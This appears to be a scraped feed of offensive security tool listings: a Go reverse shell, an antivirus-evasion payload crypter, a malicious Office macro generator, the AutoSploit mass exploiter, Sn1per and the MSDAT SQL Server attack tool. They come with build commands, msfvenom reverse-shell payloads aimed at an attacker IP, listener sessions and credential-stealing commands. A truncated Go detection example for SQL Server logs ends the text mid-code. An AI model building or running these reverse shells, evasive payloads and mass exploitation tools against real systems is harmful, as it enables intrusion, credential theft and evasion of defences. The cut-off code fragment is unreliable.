Hershell – Simple TCP reverse shell written in Go

Simple TCP reverse shell written in Go. It uses TLS to secure the communications and provides a certificate public key fingerprint pinning feature, which prevents traffic interception.

Supported OS are:
- Windows
- Linux
- Mac OS
- FreeBSD and derivatives

Why?

Although meterpreter payloads are great, they are sometimes spotted by AV products. The goal of this project is to get a simple reverse shell which can work on multiple systems.

How?

Since it's written in Go, you can cross compile the source for the desired architecture.

Building the payload

To simplify things, you can use the provided Makefile. You can set the following environment variables:
- GOOS: the target OS
- GOARCH: the target architecture
- LHOST: the attacker IP or domain name
- LPORT: the listener port

For the GOOS and GOARCH variables, you can get the allowed values here. However, some helper targets are available in the Makefile:
- depends: generates the server certificate (required for the reverse shell)
- windows32: builds a windows 32 bits executable (PE 32 bits)
- windows64: builds a windows 64 bits executable (PE 64 bits)
- linux32: builds a linux 32 bits executable (ELF 32 bits)
- linux64: builds a linux 64 bits executable (ELF 64 bits)
- macos: builds a mac os 64 bits executable (Mach-O)

For those targets, you just need to set the LHOST and LPORT environment variables.

Using the shell

Once executed, you will be provided with a remote shell. This custom interactive shell will allow you to execute system commands through cmd.exe on Windows, or /bin/sh on UNIX machines. The following special commands are supported:
- run_shell: drops you a system shell (allowing you, for example, to change directories)
- inject: injects a shellcode (base64 encoded) in the same process memory, and executes it (Windows only at the moment)
- meterpreter IP:PORT: connects to a multi/handler to get a stage2 reverse tcp meterpreter from metasploit, and executes the shellcode in memory (Windows only at the moment)
- exit: exits gracefully

Examples

First of all, you will need to generate a valid certificate:

$ make depends
openssl req -subj '/CN=sysdream.com/O=Sysdream/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem
Generating a 4096 bit RSA private key
..............................................................................++
.....++
writing new private key to 'server.key'
-----
cat server.key >> server.pem

For windows:

# Custom target
$ make GOOS=windows GOARCH=amd64 LHOST= LPORT=1234
# Predefined target
$ make windows32 LHOST= LPORT=1234

For Linux:

# Custom target
$ make GOOS=linux GOARCH=amd64 LHOST= LPORT=1234
# Predefined target
$ make linux32 LHOST= LPORT=1234

For Mac OS X:

$ make macos LHOST= LPORT=1234

Listeners

On the server side, you can use the openssl integrated TLS server:

$ openssl s_server -cert server.pem -key server.key -accept 1234
Using default temp DH parameters
ACCEPT
bad gethostbyaddr
-----BEGIN SSL SESSION PARAMETERS-----
MHUCAQECAgMDBALALwQgsR3QwizJziqh4Ps3i+xHQKs9lvp5RfsYPWjEDB68Z4kEMHnP0OD99CHv2u27THKvCHCggKEpgrPnKH+vNGJGPJZ42QylfkekhSwY5Mtr5qYI5qEGAgRYgSfgogQCAgEspAYEBAEAAAA=
-----END SSL SESSION PARAMETERS-----
Shared ciphers:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA:AES256-SHA:ECDHE-RSA-DES-CBC3-SHA:DES-CBC3-SHA
Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1
Shared Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1
Supported Elliptic Curve Point Formats: uncompressed
Supported Elliptic Curves: P-256:P-384:P-521
Shared Elliptic curves: P-256:P-384:P-521
CIPHER is ECDHE-RSA-AES128-GCM-SHA256
Secure Renegotiation IS supported
Microsoft Windows [version 10.0.10586]
(c) 2015 Microsoft Corporation. Tous droits réservés.

C:\Users\LAB2\Downloads>

Or even better, use socat with its readline module, which gives you a handy history feature:

$ socat readline openssl-listen:1234,fork,reuseaddr,verify=0,cert=server.pem
Microsoft Windows [version 10.0.10586]
(c) 2015 Microsoft Corporation. Tous droits réservés.

C:\Users\LAB2\Downloads>

Or, and this is great, use a metasploit handler:

[][Sessions: 0][Jobs: 0]: > use exploit/multi/handler
[][Sessions: 0][Jobs: 0]: exploit(handler) > set payload python/shell_reverse_tcp_ssl
payload => python/shell_reverse_tcp_ssl
[][Sessions: 0][Jobs: 0]: exploit(handler) > set lhost
lhost =>
[][Sessions: 0][Jobs: 0]: exploit(handler) > set lport 4444
lport => 4444
[][Sessions: 0][Jobs: 0]: exploit(handler) > set handlersslcert /tmp/data/server.pem
handlersslcert => /tmp/data/server.pem
[][Sessions: 0][Jobs: 0]: exploit(handler) > set exitonsession false
exitonsession => false
[][Sessions: 0][Jobs: 0]: exploit(handler) > exploit -j
[*] Exploit running as background job.
[-] Handler failed to bind to
[*] Started reverse SSL handler on
[*] Starting the payload handler...
[][Sessions: 0][Jobs: 1]: exploit(handler) >
[*] Command shell session 1 opened ( -> at 2017-02-09 12:07:51 +0000
[][Sessions: 1][Jobs: 1]: exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows [version 10.0.10586]
(c) 2015 Microsoft Corporation. Tous droits réservés.

C:\Users\lab1\Downloads>whoami
whoami
desktop-jcfs2ok\lab1

C:\Users\lab1\Downloads>

Credits

Ronan Kervella <r.kervella -at- sysdream -dot- com>

Download Hershell

Link: http://feedproxy.google.com/~r/PentestTools/~3/ztyzWsKmaJ8/hershell-simple-tcp-reverse-shell.html

Remote NTLM relaying through meterpreter on Windows port 445

The hijacking of port 445 to perform relay attacks or hash capturing attacks has been a recurring topic for a while now. When you infect a target with meterpreter, how do you listen on port 445? A few weeks ago this topic resurfaced again in part due to Dirk-jan (@_dirkjan) that saw this question flying … Continue reading “Remote NTLM relaying through meterpreter on Windows port 445"

Link: http://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445/

ASWCrypter – A Bash & Python Script For Generating Payloads That Bypass All Antivirus

A Bash & Python script for generating payloads that bypass all antivirus so far [FUD]. PLEASE DON'T UPLOAD BACKDOOR TO WWW.VIRUSTOTAL.COM

Important

This version is just for test; in future I will update ASWCrypter to generate payloads for Linux, Mac and Windows. ;)

Legal Disclaimer: The author does not hold any responsibility for the bad use of this tool; remember this is only for educational purpose.

Requirements
1- Metasploit Framework
2- Python

Getting Started

git clone https://github.com/AbedAlqaderSwedan1/ASWCrypter.git
cd ASWCrypter
chmod +x setup.sh or chmod 777 setup.sh

Screenshot

Download ASWCrypter

Link: http://feedproxy.google.com/~r/PentestTools/~3/LBt2kOgRz1c/aswcrypter-bash-script-for-generating.html

wePWNise – Generates Architecture Independent VBA Code To Be Used In Office Documents Or Templates And Automates Bypassing Application Control And Exploit Mitigation Software

wePWNise is a proof-of-concept Python script which generates VBA code that can be used in Office macros or templates. It was designed with automation and integration in mind, targeting locked down environment scenarios. The tool enumerates Software Restriction Policies (SRPs) and EMET mitigations and dynamically identifies safe binaries to inject payloads into. wePWNise integrates with existing exploitation frameworks (e.g. Metasploit, Cobalt Strike) and it also accepts any custom payload in raw format.

Prerequisites

Python termcolor package. To install run: pip install termcolor

Command line arguments

To start using wePWNise, first take a look at the options it supports:

usage: wepwnise.py [-h] -i86 -i64 <x64_shellcode> [--inject64] [--out <output_file>] [--msgbox] [--msg <window_message>]

optional arguments:
  -h, --help              show this help message and exit
  -i86 <x86_shellcode>    Input x86 raw shellcode
  -i64 <x64_shellcode>    Input x64 raw shellcode
  --inject64              Inject into 64 Bit. Set to False when delivering x86 payloads only. Default is True
  --out <output_file>     File to output the VBA macro to
  --msgbox                Present messagebox to prevent automated analysis. Default is True.
  --msg <window_message>  Custom message to present the victim if --msgbox is set to True

wePWNise requires both 32 and 64 bit raw payloads in order to be able to deliver the appropriate type when it lands on an unknown target. However, if only an x86 architecture is targeted, a dummy 64 bit payload must be provided to replace the missing code.

In order to defeat certain automated analysis configurations, a message box opens upon execution of the code. The text of the message box can be altered by defining its value in the --msg parameter. To disable this functionality set the --msgbox parameter to False.

Due to performance conditions that may be introduced as a result of long SRP/EMET policies, wePWNise reads two configuration files (binary-paths.txt and directory-paths.txt) that contain a list of executables and directories which are less likely to be monitored, to be checked first. By editing the contents of those files the user can define their own choices instead. If the files are empty, wePWNise will directly start reading the SRP/EMET policies as defined within the Registry and make its injection choice purely based on the retrieved information.

Usage examples

The following sections describe some basic usage examples of wePWNise.

Metasploit payloads

First generate the payloads for both x86 and x64 architectures in raw format and ensure that the Metasploit listeners are configured appropriately.

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -o /payloads/msf86.raw
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -a x86_64 -o /payloads/msf64.raw

Then point wePWNise to the generated payloads and direct the output to msf_wepwn.txt:

$ wepwnise.py -i86 /payloads/msf86.raw -i64 /payloads/msf64.raw --out /payloads/msf_wepwn.txt

Cobalt Strike payloads

To generate a raw payload in Cobalt Strike, navigate to the following menu and from the Output dropdown select the Raw format. Repeat the process and enable the x64 checkbox to produce a 64-bit payload.

Attacks > Packages > Payload Generator

Enter the generated payloads into wePWNise to generate the VBA code.

$ wepwnise.py -i86 /payloads/cs86.raw -i64 /payloads/cs64.raw --msgbox False --out /payloads/cs_wepwn.txt

Custom payloads

In certain cases only an x86 payload may be available. As wePWNise expects both a 32-bit and a 64-bit payload, in order to disable 64-bit injection create a dummy 64-bit file and set the --inject64 parameter to False.

$ echo "+" > /payloads/dummy64.raw
$ wepwnise.py -i86 /payloads/custom.raw -i64 /payloads/dummy64.raw --inject64 False --out /payloads/wepwn86.txt

Similarly, to generate 64-bit payloads only, create a dummy x86 file and supply it in wePWNise's -i86 command line parameter.

Download wePWNise

Link: http://feedproxy.google.com/~r/PentestTools/~3/xnUJEXNmLbQ/wepwnise-generates-architecture.html

AutoSploit v2.2 – Automated Mass Exploiter

As the name might suggest, AutoSploit attempts to automate the exploitation of remote hosts. Targets can be collected automatically through Shodan, Censys or Zoomeye, but options to add your custom targets and host lists have been included as well. The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain Reverse TCP Shells and/or Meterpreter sessions. Workspace, local host and local port for MSF facilitated back connections are configured by filling out the dialog that comes up before the exploit component is started.

Operational Security Consideration

Receiving back connections on your local machine might not be the best idea from an OPSEC standpoint. Instead consider running this tool from a VPS that has all the required dependencies available. The new version of AutoSploit has a feature that allows you to set a proxy before you connect and a custom user-agent.

Helpful links
- Usage
- Installing
- Dependencies
- User Manual: extensive usage breakdown
- Screenshots
- Reporting bugs/ideas
- Development guidelines
- Shoutouts
- Development
- Discord server
- README translations

Installation

Installing AutoSploit is very simple; you can find the latest stable release here. You can also download the master branch as a zip or tarball or follow one of the below methods;

Cloning

sudo -s << EOF
git clone https://github.com/NullArray/Autosploit.git
cd AutoSploit
chmod +x install.sh
./install.sh
python2 autosploit.py
EOF

Docker

sudo -s << EOF
git clone https://github.com/NullArray/AutoSploit.git
cd AutoSploit
chmod +x install.sh
./install.sh
cd AutoSploit/Docker
docker network create -d bridge haknet
docker run --network haknet --name msfdb -e POSTGRES_PASSWORD=s3cr3t -d postgres
docker build -t autosploit .
docker run -it --network haknet -p 80:80 -p 443:443 -p 4444:4444 autosploit
EOF

On any Linux system the following should work;

git clone https://github.com/NullArray/AutoSploit
cd AutoSploit
chmod +x install.sh
./install.sh

If you want to run AutoSploit on a macOS system: AutoSploit is compatible with macOS, however, you have to be inside a virtual environment for it to run successfully. To do this, do the following;

sudo -s << '_EOF'
pip2 install virtualenv --user
git clone https://github.com/NullArray/AutoSploit.git
virtualenv <PATH-TO-YOUR-ENV>
source <PATH-TO-YOUR-ENV>/bin/activate
cd <PATH-TO-AUTOSPLOIT>
pip2 install -r requirements.txt
chmod +x install.sh
./install.sh
python autosploit.py
_EOF

More information on running Docker can be found here.

Usage

Starting the program with python autosploit.py will open an AutoSploit terminal session. The options for which are as follows.

1. Usage And Legal
2. Gather Hosts
3. Custom Hosts
4. Add Single Host
5. View Gathered Hosts
6. Exploit Gathered Hosts
99. Quit

Choosing option 2 will prompt you for a platform specific search query. Enter IIS or Apache for example and choose a search engine. After doing so the collected hosts will be saved to be used in the Exploit component.

As of version 2.0 AutoSploit can be started with a number of command line arguments/flags as well. Type python autosploit.py -h to display all the options available to you.
I've posted the options below as well for reference.

usage: python autosploit.py -[c|z|s|a] -[q] QUERY
                            [-C] WORKSPACE LHOST LPORT
                            [-e] [--whitewash] PATH
                            [--ruby-exec] [--msf-path] PATH [-E] EXPLOIT-FILE-PATH
                            [--rand-agent] [--proxy] PROTO://IP:PORT [-P] AGENT

optional arguments:
  -h, --help            show this help message and exit

search engines:
  possible search engines to use

  -c, --censys          use censys.io as the search engine to gather hosts
  -z, --zoomeye         use zoomeye.org as the search engine to gather hosts
  -s, --shodan          use shodan.io as the search engine to gather hosts
  -a, --all             search all available search engines to gather hosts

requests:
  arguments to edit your requests

  --proxy PROTO://IP:PORT
                        run behind a proxy while performing the searches
  --random-agent        use a random HTTP User-Agent header
  -P USER-AGENT, --personal-agent USER-AGENT
                        pass a personal User-Agent to use for HTTP requests
  -q QUERY, --query QUERY
                        pass your search query

exploits:
  arguments to edit your exploits

  -E PATH, --exploit-file PATH
                        provide a text file to convert into JSON and save for later use
  -C WORKSPACE LHOST LPORT, --config WORKSPACE LHOST LPORT
                        set the configuration for MSF (IE -C default 8080)
  -e, --exploit         start exploiting the already gathered hosts

misc arguments:
  arguments that don't fit anywhere else

  --ruby-exec           if you need to run the Ruby executable with MSF use this
  --msf-path MSF-PATH   pass the path to your framework if it is not in your ENV PATH
  --whitelist PATH      only exploit hosts listed in the whitelist file

Dependencies

Note: All dependencies should be installed using the above installation method; however, if you find they are not: AutoSploit depends on the following Python 2.7 modules.

requests
psutil

Should you find you do not have these installed, get them with pip like so.

pip install requests psutil

or

pip install -r requirements.txt

Since the program invokes functionality from the Metasploit Framework you need to have this installed also. Get it from Rapid7 by clicking here.

Download AutoSploit v2.2

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZT_17-GzAcc/autosploit-v22-automated-mass-exploiter.html

UPDATED VERSION: RouterSploit 3.3.0

PenTestIT RSS Feed
Since my last update, this router exploitation framework has gone through a lot of updates. This post is about RouterSploit 3.3.0, code named I Know You Were Trouble. We will also discuss changes made to an earlier version, 3.2.0, to maintain a chain with the hopes that I keep a watch on these cool
Read more about UPDATED VERSION: RouterSploit 3.3.0
The post UPDATED VERSION: RouterSploit 3.3.0 appeared first on PenTestIT.

Link: http://pentestit.com/updated-version-routersploit-3-3-0/


UPDATED VERSION: AutoSploit 2.2

It has been some days since there was a lot of hue and cry about AutoSploit and eventually everything subsided. I wrote about it in a post titled AutoSploit = Shodan/Censys/Zoomeye + Metasploit too. Recently, an updated and improved version, AutoSploit 2.2, was released. This post will try to describe the changes between the
Read more about UPDATED VERSION: AutoSploit 2.2
The post UPDATED VERSION: AutoSploit 2.2 appeared first on PenTestIT.

Link: http://feedproxy.google.com/~r/PenTestIT/~3/1YYxIzm27jk/

Sn1per v5.0 – Automated Pentest Recon Scanner

Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.

SN1PER PROFESSIONAL FEATURES:
- Professional reporting interface
- Slideshow for all gathered screenshots
- Searchable and sortable DNS, IP and open port database
- Categorized host reports
- Quick links to online recon tools and Google hacking queries
- Personalized notes field for each host

DEMO VIDEO:

SN1PER COMMUNITY FEATURES:
- Automatically collects basic recon (ie. whois, ping, DNS, etc.)
- Automatically launches Google hacking queries against a target domain
- Automatically enumerates open ports via NMap port scanning
- Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers
- Automatically checks for sub-domain hijacking
- Automatically runs targeted NMap scripts against open ports
- Automatically runs targeted Metasploit scan and exploit modules
- Automatically scans all web applications for common vulnerabilities
- Automatically brute forces ALL open services
- Automatically tests for anonymous FTP access
- Automatically runs WPScan, Arachni and Nikto for all web services
- Automatically enumerates NFS shares
- Automatically tests for anonymous LDAP access
- Automatically enumerates SSL/TLS ciphers, protocols and vulnerabilities
- Automatically enumerates SNMP community strings, services and users
- Automatically lists SMB users and shares, checks for NULL sessions and exploits MS08-067
- Automatically exploits vulnerable JBoss, Java RMI and Tomcat servers
- Automatically tests for open X11 servers
- Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
- Performs high level enumeration of multiple hosts and subnets
- Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
- Automatically gathers screenshots of all web sites
- Create individual workspaces to store all scan output

AUTO-PWN:
- Drupal Drupalgeddon2 RCE CVE-2018-7600
- GPON Router RCE CVE-2018-10561
- Apache Struts 2 RCE CVE-2017-5638
- Apache Struts 2 RCE CVE-2017-9805
- Apache Jakarta RCE CVE-2017-5638
- Shellshock GNU Bash RCE CVE-2014-6271
- HeartBleed OpenSSL Detection CVE-2014-0160
- Default Apache Tomcat Creds CVE-2009-3843
- MS Windows SMB RCE MS08-067
- Webmin File Disclosure CVE-2006-3392
- Anonymous FTP Access
- PHPMyAdmin Backdoor RCE
- PHPMyAdmin Auth Bypass
- JBoss Java De-Serialization RCEs

KALI LINUX INSTALL:

./install.sh

DOCKER INSTALL:

Credits: @menzow
Docker Install: https://github.com/menzow/sn1per-docker
Docker Build: https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/

Example usage:

$ docker pull menzo/sn1per-docker
$ docker run --rm -ti menzo/sn1per-docker sniper menzo.io

USAGE:

[*] NORMAL MODE
sniper -t|--target

[*] NORMAL MODE + OSINT + RECON
sniper -t|--target <TARGET> -o|--osint -re|--recon

[*] STEALTH MODE + OSINT + RECON
sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon

[*] DISCOVER MODE
sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORKSPACE_ALIAS>

[*] SCAN ONLY SPECIFIC PORT
sniper -t|--target <TARGET> -m port -p|--port <portnum>

[*] FULLPORTONLY SCAN MODE
sniper -t|--target <TARGET> -fp|--fullportonly

[*] PORT SCAN MODE
sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>

[*] WEB MODE - PORT 80 + 443 ONLY!
sniper -t|--target <TARGET> -m|--mode web

[*] HTTP WEB PORT MODE
sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>

[*] HTTPS WEB PORT MODE
sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>

[*] ENABLE BRUTEFORCE
sniper -t|--target <TARGET> -b|--bruteforce

[*] AIRSTRIKE MODE
sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike

[*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED
sniper -f|--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>

[*] ENABLE LOOT IMPORTING INTO METASPLOIT
sniper -t|--target <TARGET>

[*] LOOT REIMPORT FUNCTION
sniper -w <WORKSPACE_ALIAS> --reimport

[*] UPDATE SNIPER
sniper -u|--update

MODES:

NORMAL: Performs basic scan of targets and open ports using both active and passive checks for optimal performance.
STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.
AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.
DISCOVER: Parses all hosts on a subnet/CIDR (ie. and initiates a sniper scan against each host. Useful for internal network scans.
PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
FULLPORTONLY: Performs a full detailed port scan and saves results to XML.
WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.
WEBPORTHTTP: Launches a full HTTP web application scan against a specific host and port.
WEBPORTHTTPS: Launches a full HTTPS web application scan against a specific host and port.
UPDATE: Checks for updates and upgrades all components used by sniper.
REIMPORT: Reimport all workspace files into Metasploit and reproduce all reports.
RELOAD: Reload the master workspace report.

SAMPLE REPORT:
https://gist.github.com/1N3/8214ec2da2c91691bcbc

Download Sn1per v5.0

Link: http://feedproxy.google.com/~r/PentestTools/~3/Z_yHqaJ_y1U/sn1per-v50-automated-pentest-recon.html

MSDAT – Microsoft SQL Database Attacking Tool

MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.

Usage examples of MSDAT:
- You have a Microsoft database listening remotely and you want to find valid credentials in order to connect to the database
- You have a valid Microsoft SQL account on a database and you want to escalate your privileges
- You have a valid Microsoft SQL account and you want to execute commands on the operating system hosting this DB (xp_cmdshell)

Tested on Microsoft SQL database 2005, 2008 and 2012.

Changelog

Version 1.0 (2017/02/15): first version released

Features

Thanks to MSDAT (Microsoft SQL Database Attacking Tool), you can:
- get technical information (ex: database version) of a MSSQL database without being authenticated
- search MSSQL accounts with a dictionary attack
- test each login as password (authentication required)
- get a windows shell on the database server with xp_cmdshell
- download files remotely with: OLE Automation, bulkinsert, openrowset
- upload files on the server with: OLE Automation, openrowset
- capture a SMB authentication thanks to: bulkinsert, openrowset, xp_dirtree, xp_fileexist, xp_getfiledetails
- steal MSSQL hashed passwords, on any MSSQL version
- scan ports through the database: openrowset
- execute SQL requests on a remote MSSQL server through the database (target) with: bulkinsert, openrowset
- list files/directories with: xp_subdirs, xp_dirtree
- list drives/medias with: xp_fixeddrives, xp_availablemedia
- create folder with: xp_create_subdir

Installation

Some dependencies must be installed in order to run MSDAT. In ubuntu:

sudo apt-get install freetds-dev   (or download freetds on http://www.freetds.org/)
sudo pip install cython colorlog termcolor pymssql argparse
sudo pip install argcomplete && sudo activate-global-python-argcomplete

Add "use ntlmv2 = yes" in your freetds configuration file (ex: /etc/freetds/freetds.conf or /usr/local/etc/freetds.conf). Example:

[global]
    # TDS protocol version
    tds version = 8.0
    use ntlmv2 = yes

Examples

Modules

You can list all modules:

./msdat.py -h

When you have chosen a module (example: all), you can use it and list all features and options of the module:

./msdat.py all -h

You can find out whether a specific module can be used on a MSSQL server thanks to the --test-module option. This option is implemented in each msdat module.

all module

The all module allows you to run all modules (depends on options that you have purchased).

python msdat.py all -s $SERVER

If you want:
- to use your own account file for the dictionary attack
- to try multiple passwords for a user without asking you
- to define your own timeout value

./msdat.py all -s $SERVER -p $PORT --accounts-file accounts.txt --login-timeout 10 --force-retry

In each module, you can define the charset to use with the --charset option.

mssqlinfo module

To get technical information about a remote MSSQL server without being authenticated:

./msdat.py mssqlinfo -s $SERVER -p $PORT --get-max-info

This module uses the TDS protocol and the SQL Browser Server to get information.

passwordguesser module

This module allows you to search valid credentials:

./msdat.py passwordguesser -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --force-retry --search

The --force-retry option allows testing multiple passwords for each user without asking you. You can specify your own account file with the --accounts-file option:

./msdat.py passwordguesser -s $SERVER -p $PORT --search --accounts-file accounts.txt --force-retry

passwordstealer module

To dump hashed passwords:

./msdat.py passwordstealer -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --dump --save-to-file test.txt

This module has been tested on SQL Server 2000, 2005, 2008 and 2014.

xpcmdshell module

To execute system commands thanks to xp_cmdshell (https://msdn.microsoft.com/en-us/library/ms190693.aspx):

./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --shell

This previous command gives you an interactive shell on the remote database server. If xp_cmdshell is not enabled, the --enable-xpcmdshell option can be used in this module to activate it:

./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --enable-xpcmdshell --disable-xpcmdshell --shell

The --enable-xpcmdshell option enables xp_cmdshell if it is not enabled (it is not enabled by default). The --disable-xpcmdshell option disables xp_cmdshell if this one is enabled.

smbauthcapture module

Thanks to this module, you can capture a SMB authentication:

./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --capture $MY_IP_ADDRESS --share-name SHARE

To capture the SMB authentication, the auxiliary/server/capture/smb (http://www.rapid7.com/db/modules/auxiliary/server/capture/smb) module of metasploit could be used:

msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > exploit

The capture command of this module tries to capture a SMB authentication thanks to the xp_dirtree, xp_fileexist or xp_getfiledetails procedure. If you want to choose the SMB authentication procedure to capture the authentication:

./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-dirtree-capture
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-fileexist-capture
./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-getfiledetails-capture

You can change the SHARE name with the --share-name option.

oleautomation module

This module can be used to read/write files on the database server. The following command reads the file temp.txt stored on the database server:

./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt'

To write a string in a file (temp.txt) remotely:

./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --write-file 'C:\Users\Administrator\Desktop\temp.txt' 'a\nb\nc\nd\ne\nf'

This module can be used to download a file (C:\Users\Administrator\Desktop\temp.txt) stored on the database server:

./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --get-file 'C:\Users\Administrator\Desktop\temp.txt' temp.txt

Also, you can use this module to upload a file (temp.txt) on the target:

./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --put-file temp.txt 'C:\Users\Administrator\Desktop\temp.txt'

bulkopen module

The module bulkopen can be used:
- to read/download files stored on a database server
- to scan ports through the database server
- to execute SQL requests on a remote MSSQL server through the database

To read a file stored on the target, the following command can be used:

./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt'

The --method option can be used to specify the method to use: bulkinsert (https://msdn.microsoft.com/en-us/library/ms188365.aspx) or openrowset (https://msdn.microsoft.com/en-us/library/ms190312.aspx):

./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt' --method openrowset

To download a file (C:\Users\Administrator\Desktop\temp.txt):

./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --get-file 'C:\Users\Administrator\Desktop\temp.txt' temp.txt

This module can be used to scan ports (1433 and 1434 of through the database server:

./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --scan-ports 1433,1434 -v

You can scan a range of ports:

./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --scan-ports 1433-1438

This module can be used to execute SQL requests (ex: select @@ServerName) on a remote database server (ex: $SERVER2) through the database ($SERVER):

./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --request-rdb $SERVER2 $PORT $DATABASE $USER $PASSWORD 'select @@ServerName'

xpdirectory module

The module xpdirectory can be used:
- to list files, directories and drives
- to check if a file exists
- to create a directory

To list files in a specific directory:

./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-files 'C:\'

To list directories in a specific directory:

./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-dir 'C:\'

To list drives:

./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-fixed-drives --list-available-media

To check if a file exists:

./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --file-exists 'C:\' --file-exists 'file.txt'

To create a directory:

./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --create-dir 'C:\temp'

search module

The module search can be used to search a pattern in column names of tables and views. Useful to search the pattern %password% in column names, for example. To get column names which contain password patterns (ex: passwd, password, motdepasse, clave):

./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --pwd-column-names --show-empty-columns

If you want to see column names which don't contain any data, you should use the option --show-empty-columns. To search a specific pattern in column names of views and tables:

./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --pwd-column-names --show-empty-columns

Download MSDAT
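Every MSDAT module above leaves a server-side trace: the passwordguesser module produces failed logins, and the xpcmdshell, oleautomation and bulkopen/openrowset modules depend on the `xp_cmdshell`, `Ole Automation Procedures` and `Ad Hoc Distributed Queries` options being turned on with sp_configure, which SQL Server records in its ERRORLOG. The following is an added example, not part of MSDAT, of detection logic run over such log lines: it flags risky options switching from 0 to 1 and counts failed logins per client address. The log lines are constructed for the example (the message texts follow SQL Server's standard sp_configure and error 18456 wording); the function names, the client addresses and the threshold of three are assumptions.

```go
// Added example (not MSDAT's code): SQL Server ERRORLOG detection for the traces
// the modules above leave behind.
package main

import (
	"fmt"
	"regexp"
	"sort"
	"strings"
)

// riskyOptions maps sp_configure options to the capability their enablement grants.
// 'show advanced options' is a precondition for all of them but is too noisy to alert on.
var riskyOptions = map[string]string{
	"xp_cmdshell":                "OS command execution through xp_cmdshell",
	"Ole Automation Procedures":  "file read/write through OLE automation",
	"Ad Hoc Distributed Queries": "outbound connections through OPENROWSET/OPENDATASOURCE",
}

// configChange matches the message sp_configure writes when an option is changed.
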